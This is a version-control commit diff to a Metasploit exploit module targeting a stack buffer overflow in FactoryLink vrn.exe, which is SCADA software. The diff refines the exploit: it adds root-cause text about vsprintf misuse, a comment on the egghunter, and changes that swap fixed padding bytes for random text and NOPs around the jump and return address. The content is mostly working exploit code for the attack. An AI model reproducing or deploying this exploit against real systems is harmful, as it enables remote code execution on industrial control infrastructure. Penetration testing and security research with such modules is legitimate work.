RCA, description update, and some text randomness

git-svn-id: file:///home/svn/framework3/trunk@12998 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/scada/factorylink_vrn_09.rb

@@ -21,9 +21,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => 'FactoryLink vrn.exe Opcode 9 Buffer Overflow',
 			'Description'    => %q{
-					This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2, and 8.0.1.703.
-					By sending a specially crafted packet, an attacker may be able to execute arbitrary code. 
-					Originally found and posted by Luigi Auriemma.
+					This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,
+				and 8.0.1.703.  By sending a specially crafted packet, an attacker may be able to
+				execute arbitrary code due to the improper use of a vsprintf() function while
+				processing the user-supplied text field.  Originally found and posted by
+				Luigi Auriemma.
 			},
 			'Author'         =>
 				[ 
@@ -64,6 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		connect
 
+		#The use of egghunter seems appropriate due to the small buffer in [ESP+8]
 		hunter = generate_egghunter(payload.encoded, payload_badchars,
 			{ :checksum => true, :startreg => 'ebp'})
 
@@ -82,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		request =  header
 		request << rand_text_alpha_upper(100)
 		request << egg
-		request <<  ("C" * target['padding'])
+		request << rand_text_alpha(target['padding'])
 		request << "\xeb\x06\x90\x90"
 		request << [target.ret].pack('V')
-		request <<  "C"*24
+		request << make_nops(24)
 		request << hunter[0]
 		request << rand_text_alpha_upper(100000)